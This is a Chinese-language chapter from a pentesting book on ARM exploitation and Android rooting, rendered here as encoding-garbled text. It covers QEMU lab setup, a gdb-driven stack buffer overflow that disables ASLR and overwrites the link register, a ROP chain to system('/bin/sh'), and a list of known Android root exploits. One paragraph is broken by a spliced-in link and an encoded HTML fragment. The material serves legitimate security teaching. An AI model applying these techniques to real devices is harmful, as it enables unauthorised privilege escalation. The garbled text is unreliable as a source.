×÷ÕߣºAditya Gupta
ÒëÕߣº·ÉÁú
ÐÒ飺CC BY-NC-SA 4.0
ÔÚ±¾ÕÂÖУ¬ÎÒÃǽ«Á˽â ARM ´¦ÀíÆ÷µÄ»ù´¡ÖªÊ¶£¬ºÍ ARM ÊÀ½çÖдæÔڵIJ»Í¬ÀàÐ͵Ä©¶´¡£ ÎÒÃÇÉõÖÁ»á¼ÌÐøÀûÓÃÕâЩ©¶´£¬ÒÔ±ã¶ÔÕû¸ö³¡¾°ÓиöÇåÎúµØÁ˽⡣ ´ËÍ⣬ÎÒÃǽ«Ñо¿²»Í¬µÄ Android root ¹¥»÷ºÍËüÃÇÔÚ©¶´ÀûÓÃÖеĻù±¾Â©¶´¡£ ¿¼Âǵ½Ä¿Ç°´ó¶àÊý Android ÖÇÄÜÊÖ»ú¶¼Ê¹ÓûùÓÚ ARM µÄ´¦ÀíÆ÷£¬¶ÔÓÚÉøÍ¸²âÊÔÈËÔ±À´Ëµ£¬Á˽â ARM ¼°Æä¸½´øµÄ°²È«·çÏÕÖÁ¹ØÖØÒª¡£
ARM ÊÇ»ùÓÚ¾«¼òÖ¸Á£¨RISC£©µÄ¼Ü¹¹£¬ÕâÒâζ×ÅÆäÖ¸Áî±È»ùÓÚ¸´ÔÓÖ¸Á£¨CISC£©µÄ»úÆ÷Éٵöࡣ ARM ´¦ÀíÆ÷¼¸ºõ±é²¼ÎÒÃÇÖÜΧµÄËùÓÐÉ豸£¬ÈçÖÇÄÜÊÖ»ú£¬µçÊÓ£¬µç×ÓÊéÔĶÁÆ÷ºÍ¸ü¶àµÄǶÈëʽÉ豸¡£
ARM ×ܹ²ÓÐ 16 ¸ö¿É¼ûµÄͨÓüĴæÆ÷£¬Îª R0-R15¡£ ÔÚÕâ 16 ¸öÖУ¬ÓÐ 5 ¸öÓÃÓÚÌØÊâÄ¿µÄ¡£ ÒÔÏÂÊÇÕâÎå¸ö¼Ä´æÆ÷¼°ÆäÃû³Æ£º
R11: Ö¡Ö¸Õë (FP) R12: ¹ý³ÌÄڼĴæÆ÷ (IP) R13: Õ»Ö¸Õë (SP) R14: Á´½Ó¼Ä´æÆ÷ (LR) R15: ³ÌÐò¼ÆÊýÆ÷ (PC)ÏÂÃæµÄͼչʾÁË ARM ¼Ü¹¹£º
ÔÚÎå¸öÀïÃæ£¬ÎÒÃÇ»áÌØ±ðרעÓÚÕâÈý¸ö£¬ËüÃÇÊÇ£º
¶ÑÕ»Ö¸Õ루SP£©£ºÕâÊDZ£´æÖ¸Ïò¶ÑÕ»¶¥²¿µÄÖ¸ÕëµÄ¼Ä´æÆ÷ Á´½Ó¼Ä´æÆ÷£¨LR£©£ºµ±³ÌÐò½øÈë×Ó¹ý³Ìʱ´æ´¢·µ»ØµØÖ· ³ÌÐò¼ÆÊýÆ÷£¨PC£©£º´æ´¢ÒªÖ´ÐеÄÏÂÒ»ÌõÖ¸Áî×¢Òâ
ÕâÀïҪעÒâµÄÒ»µãÊÇ£¬PC ½«×ÜÊÇÖ¸ÏòÒªÖ´ÐеÄÖ¸Á¶ø²»ÊǼòµ¥µØÖ¸ÏòÏÂÒ»ÌõÖ¸Áî¡£ ÕâÊÇÓÉÓÚ±»³ÆÎªÁ÷Ë®ÏߵĸÅÄָÁî°´ÕÕÒÔÏÂ˳Ðò²Ù×÷£ºÌáÈ¡£¬½âÂëºÍÖ´ÐС£ ΪÁË¿ØÖƳÌÐòÁ÷£¬ÎÒÃÇÐèÒª¿ØÖÆ PC »ò LR ÖеÄÖµ£¨ºóÕß×îÖÕÒýµ¼ÎÒÃÇ¿ØÖÆ PC£©¡£
ARM ÓÐÁ½ÖÖ²»Í¬µÄÖ´ÐÐģʽ£º
ARM ģʽ£ºÔÚ ARM ģʽÏ£¬ËùÓÐÖ¸ÁîµÄ´óСΪ 32 λ Thumb ģʽ£ºÔÚ Thumb ģʽÏ£¬Ö¸Áî´ó²¿·ÖΪ 16 λִÐÐģʽÓÉ CPSR ¼Ä´æÆ÷ÖеÄ״̬¾ö¶¨¡£ »¹´æÔÚµÚÈýģʽ£¬¼´ Thumb-2 ģʽ£¬Ëü½ö½öÊÇ ARM ģʽºÍ Thumb ģʽµÄ»ìºÏ¡£ ÎÒÃÇÔÚ±¾Õ²»»áÉîÈëÁ˽â ARM ºÍ Thumb ģʽ֮¼äµÄÇø±ð£¬ÒòΪËü³¬³öÁ˱¾ÊéµÄ·¶Î§¡£
ÔÚ¿ªÊ¼ÀûÓà ARM ƽ̨µÄ©¶´Ö®Ç°£¬½¨ÒéÄ㽨Á¢»·¾³¡£ ¼´Ê¹ Android SDK ÖеÄÄ£ÄâÆ÷¿ÉÒÔͨ¹ýÄ£Äâ ARM ƽ̨À´ÔËÐУ¬´ó¶àÊýÖÇÄÜÊÖ»úÒ²ÊÇ»ùÓÚ ARM µÄ£¬ÎÒÃǽ«Í¨¹ýÅäÖà QEMU£¨ËüÊÇÒ»¸ö¿ªÔ´Ó²¼þÐéÄâ»úºÍÄ£ÄâÆ÷£©¿ªÊ¼ ARM ©¶´ÀûÓá£
ΪÁËÔÚ Android Ä£ÄâÆ÷/É豸ÉÏÖ´ÐÐÒÔÏÂËùÓв½Ö裬ÎÒÃÇÐèÒªÏÂÔØ Android NDK ²¢Ê¹Óà Android NDK ÖÐÌṩµÄ¹¤¾ßΪ Android ƽ̨±àÒëÎÒÃǵĶþ½øÖÆÎļþ¡£ µ«ÊÇ£¬Èç¹ûÄãʹÓà Mac »·¾³£¬°²×° QEMU Ïà¶ÔÈÝÒ×£¬¿ÉÒÔͨ¹ý¼üÈëbrew install qemuÀ´Íê³É¡£ ÏÖÔÚÈÃÎÒÃÇÔÚ Ubuntu ϵͳÉÏÅäÖà QEMU¡£ ×ñÑÒÔϲ½Ö裺
µÚÒ»²½ÊÇͨ¹ý°²×°ÒÀÀµÀ´ÏÂÔØ²¢°²×° QEMU£¬ÈçͼËùʾ£º
sudo apt-get build-dep qemu wget http://wiki.qemu-project.org/download/qemu- 1.7.0.tar.bz2
½ÓÏÂÀ´£¬ÎÒÃÇÖ»ÐèÒªÅäÖÃQEMU£¬Ö¸¶¨Ä¿±êΪ ARM£¬×îºó³ä·ÖÀûÓÃËü¡£ Òò´Ë£¬ÎÒÃǽ«¼òµ¥µØ½âѹËõ¹éµµÎļþ£¬·ÃÎʸÃĿ¼²¢Ö´ÐÐÒÔÏÂÃüÁ
./configure --target-list=arm-softmmu make && make install
Ò»µ©QEMU³É¹¦°²×°£¬ÎÒÃÇ¿ÉÒÔÏÂÔØ ARM ƽ̨µÄ Debian ¾µÏñÀ´½øÐÐÀûÓÃÁ·Ï°¡£ ËùÐèÏÂÔØÁбíλÓÚhttp://people.debian.org/~aurel32/qemu/armel/¡£
ÕâÀïÎÒÃǽ«ÏÂÔØ¸ñʽΪqcow2µÄ´ÅÅÌÓ³Ïñ£¬ËüÊÇ»ùÓÚ QEMU µÄ²Ù×÷ϵͳӳÏñ¸ñʽ£¬Ò²¾ÍÊÇÎÒÃǵIJÙ×÷ϵͳΪdebian_squeeze_armel_standard.qcow2¡£ ÄÚºËÎļþÓ¦¸ÃÊÇvmlinuz-2.6.32-5-versatile£¬RAM ´ÅÅÌÎļþÓ¦¸ÃÊÇinitrd.img-2.6.32-versatile¡£ Ò»µ©ÎÒÃÇÏÂÔØÁËËùÓбØÒªµÄÎļþ£¬ÎÒÃÇ¿ÉÒÔͨ¹ýÖ´ÐÐÒÔÏÂÃüÁîÀ´Æô¶¯ QEMU ʵÀý£º
qemu-system-arm -M versatilepb -kernel vmlinuz-2.6.32-5- versatile -initrd initrd.img-2.6.32-5-versatile -hda debian_squeeze_armel_standard.qcow2 -append 'root=/dev/sda1' --redir tcp:2222::22
redirÃüÁîÖ»ÊÇÔڵǼԶ³ÌϵͳʱʹÓÃ¶Ë¿Ú 2222 ÆôÓà ssh¡£
Ò»µ©ÅäÖÃÍê³É£¬ÎÒÃÇ¿ÉÒÔʹÓÃÒÔÏÂÃüÁîµÇ¼µ½ Debian µÄ QEMU ʵÀý£º
ssh root@[ip address of Qemu] -p 2222
µÇ¼ʱ»áÒªÇóÊäÈëÓû§ÃûºÍÃÜÂ룬ĬÈÏÆ¾¾ÝÊÇroot:root¡£Ò»µ©ÎÒÃdzɹ¦µÇ¼£¬ÎÒÃǽ«¿´µ½ÀàËÆÈçÏÂËùʾµÄÆÁÄ»½ØÍ¼£º
¼òµ¥À´Ëµ£¬»º³åÇøÊÇ´æ´¢ÈκÎÀàÐ͵ÄÊý¾ÝµÄµØ·½¡£ µ±»º³åÇøÖеÄÊý¾Ý³¬¹ý»º³åÇø±¾ÉíµÄ´óСʱ£¬»á·¢ÉúÒç³ö¡£ È»ºó¹¥»÷Õß¿ÉÒÔÖ´ÐÐÒç³ö¹¥»÷£¬À´»ñµÃ¶Ô³ÌÐòµÄ¿ØÖƺÍÖ´ÐжñÒâÔØºÉ¡£
ÈÃÎÒÃÇʹÓÃÒ»¸ö¼òµ¥³ÌÐòµÄÀý×Ó£¬¿´¿´ÎÒÃÇÈçºÎÀûÓÃËü¡£ ÔÚÏÂÃæµÄ½ØÍ¼ÖУ¬ÎÒÃÇÓÐÒ»¸ö¼òµ¥µÄ³ÌÐò£¬ÓÐÈý¸öº¯Êý£ºweak£¬ShouldNotBeCalledºÍmain¡£ ÒÔÏÂÊÇÎÒÃÇÊÔͼÀûÓõijÌÐò£º
ÔÚÕû¸ö³ÌÐòÔËÐÐÆÚ¼ä£¬´Ó²»µ÷ÓÃShouldNotBeCalledº¯Êý¡£
©¶´º¯Êý¼òµ¥µØ½š†·Ÿ"http://www.it165.net/design/wrss/" target="_blank" class="keylink">rss7K/bi01sa1vcP7zqpidWZmtcS7urPlx/ijrLTz0KHOqiAxMCDX1r3aoaM8L3A+CjxwPtK7tanO0sPHzeqzybPM0PKx4NC0o6zO0sPHv8nS1Mq508NnY2Ox4NLry/yjrMjnz8LSu7j2w/zB7sv5yr6hoyC0y83io6zO0sPHvavU2tXiwO+9+9PDtdjWt7/VvOSyvL7Wy+a7+ruvo6hBU0xSo6mjrNa7ysfOqsHLyrmzob6wydTOorzytaXSu9CpoaMgQVNMUiDKx9PJIE9TIMq1z9a1xLCyyKu8vMr1o6zAtLfA1rm5pbv31d/T0NCntdjIt7ao1Ni6ybXEtdjWt7Ki1rTQ0Lbx0uLWuMHuoaMg1NogQW5kcm9pZCDW0KOsQVNMUiC1xMq1z9bKvNPaIDQuMKGjIMTjv8nS1LfDzspodHRwOi8vd3d3LmR1b3NlY3VyaXR5LmNvbS9ibG9nL2V4cGxvaXQtbWl0aWdhdGlvbnMtaW4tYW5kcm9pZC1qZWxseS1iZWFuLTQtMcHLveLL+dPQIEFuZHJvaWQgsLLIq8q1yqmhozwvcD4KPHByZSBjbGFzcz0="brush:java;"> echo 0 > /proc/sys/kernel/randomize_va_space gcc -g buffer_overflow.c -o buffer_overflow
½ÓÏÂÀ´£¬ÎÒÃÇ¿ÉÒÔ¼òµ¥½«¶þ½øÖÆÎļþ¼ÓÔØµ½ GNU µ÷ÊÔÆ÷£¬¼ò³Æ GDB£¬È»ºó¿ªÊ¼µ÷ÊÔËü£¬ÈçÏÂÃæµÄÃüÁîËùʾ£º
gdb -q buffer_overflow
ÏÖÔÚÎÒÃÇ¿ÉÒÔʹÓÃdisassÃüÁîÀ´·´»ã±àÌØ¶¨µÄº¯Êý£¬ÕâÀïÊÇShouldNotBeCalled£¬ÈçÏÂÃæµÄ½ØÍ¼Ëùʾ£º
ÕýÈçÎÒÃÇÔÚÉÏÃæµÄ½ØÍ¼ÖпÉÒÔ¿´µ½µÄ£¬ShouldNotBeCalledº¯Êý´ÓÄÚ´æµØÖ·0x00008408¿ªÊ¼¡£ Èç¹ûÎÒÃDz鿴mainº¯ÊýµÄ·´»ã±à£¬ÎÒÃÇ¿´µ½Â©¶´º¯ÊýÔÚ0x000084a4±»µ÷Óò¢ÔÚ0x000084a8·µ»Ø¡£ Òò´Ë£¬ÓÉÓÚ³ÌÐò½øÈë©¶´º¯Êý²¢Ê¹ÓÃÒ×Êܹ¥»÷µÄstrcpy£¬º¯Êý²»¼ì²éÒª¸´ÖƵÄ×Ö·û´®µÄ´óС£¬²¢ÇÒÈç¹ûÎÒÃÇÄܹ»ÔÚ³ÌÐò½øÈë©¶´º¯Êýʱ¿ØÖÆ×Ó¹ý³ÌµÄ LR £¬ÎÒÃǾÍÄܹ»¿ØÖÆÕû¸ö³ÌÐòÁ÷³Ì¡£
ÕâÀïµÄÄ¿±êÊǹÀ¼ÆºÎʱ LR ±»¸²¸Ç£¬È»ºó·ÅÈëShouldNotBeCalledµÄµØÖ·£¬ÒÔ±ãµ÷ÓÃShouldNotBeCalledº¯Êý¡£ ÈÃÎÒÃÇ¿ªÊ¼Ê¹ÓÃÒ»¸ö³¤²ÎÊýÔËÐгÌÐò£¬ÈçÏÂÃæµÄÃüÁîËùʾ£¬¿´¿´»á·¢Éúʲô¡£ ÔÚ´Ë֮ǰ£¬ÎÒÃÇ»¹ÐèÒªÔÚ©¶´º¯ÊýºÍstrcpyµ÷ÓõĵØÖ·ÉèÖöϵ㡣
b vulnerable b *<address of the strcpy call>
Ò»µ©ÎÒÃÇÉèÖÃÁ˶ϵ㣬ÎÒÃÇ¿ÉÒÔʹÓòÎÊýAAAABBBBCCCCÀ´ÔËÐÐÎÒÃǵijÌÐò£¬¿´¿´ËüÊÇÈçºÎ±»¸²¸ÇµÄ¡£ ÎÒÃÇ×¢Òâµ½ËüÔÚ©¶´º¯ÊýµÄµ÷Óô¦ÃüÖÐÁ˵ÚÒ»¸ö¶Ïµã£¬Ö®ºóÔÚstrcpyµ÷Óô¦ÃüÖÐÁËÏÂÒ»¸ö¶Ïµã¡£ Ò»µ©Ëüµ½´ï¶Ïµã£¬ÎÒÃÇ¿ÉÒÔʹÓÃxÃüÁî·ÖÎö¶ÑÕ»£¬²¢Ö¸¶¨À´×Ô SP µÄµØÖ·£¬ÈçÏÂÃæµÄ½ØÍ¼Ëùʾ£º
ÎÒÃÇ¿ÉÒÔ¿´µ½£¬¶ÑÕ»ÒѾ±»ÎÒÃÇÊäÈëµÄ»º³åÇø¸²¸Ç£¨ASCII£º41 ´ú±í A£¬42 ´ú±í B£¬µÈµÈ£©¡£ ´ÓÉÏÃæµÄ½ØÍ¼ÖУ¬ÎÒÃÇ¿´µ½£¬ÎÒÃÇÈÔÈ»ÐèÒªËĸö¸ü¶àµÄ×Ö½ÚÀ´¸²¸Ç·µ»ØµØÖ·£¬ÔÚÕâÖÖÇé¿öÏÂÊÇ0x000084a8¡£
ËùÒÔ£¬×îºóµÄ×Ö·û´®ÊÇ 16 ×Ö½ÚµÄÀ¬»ø£¬È»ºóÊÇShouldNotBeCalledµÄµØÖ·£¬ÈçÏÂÃæµÄÃüÁîËùʾ£º
r `printf 'AAAABBBBCCCCDDDD8?'`
ÎÒÃÇ¿ÉÒÔÔÚÏÂÃæµÄ½ØÍ¼Öп´µ½£¬ÎÒÃÇÒѾ½«IShouldNeverBeCalledµÄÆðʼµØÖ·Ìí¼Óµ½Á˲ÎÊýÖУº
Çë×¢Ò⣬ÓÉÓÚÕâÀïÊÇС¶Ë½á¹¹£¬×Ö½ÚÒÔÏà·´µÄ˳ÐòдÈë¡£ Ò»µ©ÎÒÃÇÔËÐÐËü£¬ÎÒÃÇ¿ÉÒÔ¿´µ½³ÌÐòShouldNotBeCalledº¯Êý±»µ÷Óã¬ÈçÏÂÃæµÄ½ØÍ¼Ëùʾ£º
ÔÚ´ó¶àÊýÇé¿öÏ£¬ÎÒÃDz»ÐèÒªµ÷ÓóÌÐò±¾ÉíÖдæÔÚµÄÁíÒ»¸öº¯Êý¡£ Ïà·´£¬ÎÒÃÇÐèÒªÔÚÎÒÃǵĹ¥»÷ÏòÁ¿ÖзÅÖà shellcode£¬Õ⽫ִÐÐÎÒÃÇÔÚ shellcode ÖÐÖ¸¶¨µÄÈκζñÒâ²Ù×÷¡£ µ«ÊÇ£¬ÔÚ´ó¶àÊý»ùÓÚ ARM ƽ̨µÄÉ豸ÖУ¬ÄÚ´æÖеÄÇøÓòÊDz»¿ÉÖ´Ðеģ¬Õâ»á×èÖ¹ÎÒÃÇ·ÅÖò¢Ö´ÐÐ shellcode¡£
Òò´Ë£¬¹¥»÷Õß±ØÐëÒÀÀµÓÚËùνµÄ·µ»Øµ¼Ïò±à³Ì£¨ROP£©£¬ËüÊÇÀ´×ÔÄڴ治ͬ²¿·ÖµÄÖ¸ÁîÆ¬¶ÎµÄ¼òµ¥Á´½Ó£¬×îÖÕËü»áÖ´ÐÐÎÒÃÇµÄ shellcode¡£ ÕâЩƬ¶ÎÒ²³ÆÎª ROP gadget¡£ ΪÁËÁ´½Ó ROP gadget£¬ÎÒÃÇÐèÒªÕÒµ½´æÔÚÌø×ªÖ¸ÁîµÄ gadget£¬Õ⽫ÔÊÐíÎÒÃÇÌøµ½ÁíÒ»¸öλÖá£
ÀýÈ磬Èç¹ûÎÒÃÇÔÚÖ´ÐгÌÐòʱ·´»ã±àseed48()£¬ÎÒÃǽ«×¢Òâµ½ÒÔÏÂÊä³ö£º
Èç¹ûÎÒÃDz鿴·´»ã±à£¬ÎÒÃǽ«×¢Òâµ½Ëü°üº¬Ò»¸ö ADD Ö¸ÁºóÃæ¸ú×ÅÒ»¸ö POP ºÍ BX Ö¸ÁÕâÊÇÒ»¸öÍêÃÀµÄ ROP gadget¡£ ÕâÀ¹¥»÷Õß¿ÉÄÜ»áÏëµ½£¬ÎªÁ˽«ÆäÓÃ×÷ ROP gadget£¬Ê×ÏÈÌøµ½¿ØÖÆ r4 µÄ POP Ö¸ÁȻºó½«±È/bin/shµÄµØÖ·Ð¡ 6 µÄÖµ·ÅÈë r4 ÖУ¬½« ADD Ö¸ÁîµÄÖµ·ÅÈë LR ÖС£ Òò´Ë£¬µ±ÎÒÃÇÌø»Øµ½ ADD Ò²¾ÍÊÇR0 = R4 + 6ʱ£¬ÎÒÃǾÍÓµÓÐÁË/bin/shµÄµØÖ·£¬È»ºóÎÒÃÇ¿ÉÒÔΪ R4 Ö¸¶¨ÈκÎÀ¬»øµØÖ·²¢ÇÒΪ LR Ö¸¶¨system()µÄµØÖ·¡£
ÕâÒâζ×ÅÎÒÃǽ«×îÖÕÌø×ªµ½Ê¹ÓòÎÊý/bin/shµÄsystem()£¬Õ⽫ִÐÐ shell¡£ ÒÔͬÑùµÄ·½Ê½£¬ÎÒÃÇ¿ÉÒÔ´´½¨ÈκΠROP gadget£¬²¢Ê¹ÆäÖ´ÐÐÎÒÃÇËùÐèÒªµÄÈκζ«Î÷¡£ ÓÉÓÚ ROP ÊÇ¿ª·¢ÖÐ×ÔÓµÄÖ÷ÌâÖ®Ò»£¬Òò´ËÇ¿ÁÒ½¨ÒéÄã×Ô¼º³¢ÊÔ£¬·ÖÎö·´»ã±à´úÂë²¢¹¹½¨Â©¶´¡£
´ÓÔçÆÚ°æ±¾µÄ Android ¿ªÊ¼£¬Android root ©¶´¿ªÊ¼³öÏÖÓÚÿ¸öºóÐø°æ±¾ºÍ²»Í¬µÄ Android Éè±¸ÖÆÔìÉ̵İ汾ÖС£ Android root ¼òµ¥À´ËµÊÇ»ñµÃ¶ÔÉ豸µÄ·ÃÎÊÌØÈ¨£¬Ä¬ÈÏÇé¿öÏÂÉè±¸ÖÆÔìÉ̲»»á½«ÆäÊÚÓèÓû§¡£ ÕâЩ root ¹¥»÷ÀûÓÃÁË Android ϵͳÖдæÔڵĸ÷ÖÖ©¶´¡£ ÒÔÏÂÊÇÆäÖÐһЩµÄÁÐ±í£¬´øÓЩ¶´ÀûÓÃËù»ùÓÚµÄ˼Ï룺
Exploid£º»ùÓÚ udev ÖÐµÄ CVE-2009-1185 ©¶´£¬ËüÊÇ Android ¸ºÔð USB Á¬½ÓµÄ×é¼þ£¬ËüÑéÖ¤ Netlink ÏûÏ¢£¨Ò»ÖÖ¸ºÔ𽫠Linux ÄÚºËÓëÓû§Á¬½ÓµÄÏûÏ¢£©ÊÇ·ñÔ´×ÔÔʼÀ´Ô´»òÊÇÓɹ¥»÷ÕßαÔì¡£Òò´Ë£¬¹¥»÷Õß¿ÉÒÔ¼òµ¥µØ´ÓÓû§¿Õ¼ä±¾Éí·¢ËÍ udev ÏûÏ¢²¢ÌáÉýȨÏÞ¡£ Gingerbreak£ºÕâÊÇÁíÒ»¸ö©¶´£¬»ùÓÚ vold ÖдæÔڵĩ¶´£¬ÀàËÆÓÚ Exploid ÖеÄ©¶´¡£ RageAgainstTheCage£º´Ë©¶´ÀûÓûùÓÚRLIMIT_NPROC£¬ËüÖ¸¶¨ÔÚµ÷ÓÃsetuidº¯Êýʱ¿ÉΪÓû§´´½¨µÄ½ø³ÌµÄ×î´óÊýÄ¿¡£ adb ÊØ»¤³ÌÐòÒÔ root Éí·ÝÆô¶¯;È»ºóËüʹÓÃsetuid()µ÷ÓÃÀ´½â³ýÌØÈ¨¡£µ«ÊÇ£¬Èç¹û¸ù¾ÝRLIMIT_NPROC´ïµ½ÁË×î´ó½ø³ÌÊý£¬³ÌÐò½«ÎÞ·¨µ÷ÓÃsetuid()À´½â³ýÌØÈ¨£¬adb ½«¼ÌÐøÒÔ root Éí·ÝÔËÐС£ Zimperlich£ºÊ¹ÓÃÓë RageAgainstTheCage µÄÏàͬ¸ÅÄµ«ËüÒÀÀµÓÚ zygote ½ø³Ì½â³ý root ȨÏÞ¡£ KillingInTheNameOf£ºÀûÓÃÁËÒ»¸ö³ÆÎªashmem£¨¹²ÏíÄÚ´æ¹ÜÀíÆ÷£©½Ó¿ÚµÄ©¶´£¬¸Ã©¶´ÓÃÓÚ¸ü¸Äro.secureµÄÖµ£¬¸Ãֵȷ¶¨É豸µÄ root ״̬¡£ÕâЩÊÇһЩ×îÖªÃûµÄ Android ©¶´ÀûÓã¬ÓÃÓÚ root Android É豸¡£
ÔÚ±¾ÕÂÖУ¬ÎÒÃÇÁ˽âÁË Android ÀûÓÃºÍ ARM ÀûÓõIJ»Í¬·½Ê½¡£ Ï£Íû±¾Õ¶ÔÓÚÈκÎÏëÒª¸üÉîÈëµØÀûÓà ARM µÄÈËÀ´Ëµ£¬¶¼ÊÇÒ»¸öºÃµÄ¿ªÊ¼¡£
ÔÚÏÂÒ»ÕÂÖУ¬ÎÒÃǽ«Á˽âÈçºÎ±àд Android ÉøÍ¸²âÊÔ±¨¸æ¡£